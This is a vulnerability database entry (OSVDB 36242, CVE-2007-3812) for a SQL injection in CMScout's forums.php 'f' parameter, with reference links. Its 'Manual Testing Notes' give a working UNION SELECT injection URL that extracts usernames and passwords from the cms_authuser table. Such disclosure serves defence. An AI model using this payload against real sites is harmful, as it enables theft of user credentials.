CMScout forums.php f Variable SQL Injection

2007-07-13T17:07:54
ID OSVDB:36242
Type osvdb
Reporter FiSh()
Modified 2007-07-13T17:07:54

Description

Manual Testing Notes

http://[target]/index.php?page=forums&f=1//union//all//select//0,uname,passwd,2,3,4,5,6,7,8//from//cms_authuser/*

References:

Secunia Advisory ID:26026 Other Advisory URL: http://packetstorm.linuxsecurity.com/0707-exploits/cmscout.txt ISS X-Force ID: 35393 Generic Exploit URL: http://www.milw0rm.com/exploits/4182 CVE-2007-3812 Bugtraq ID: 24906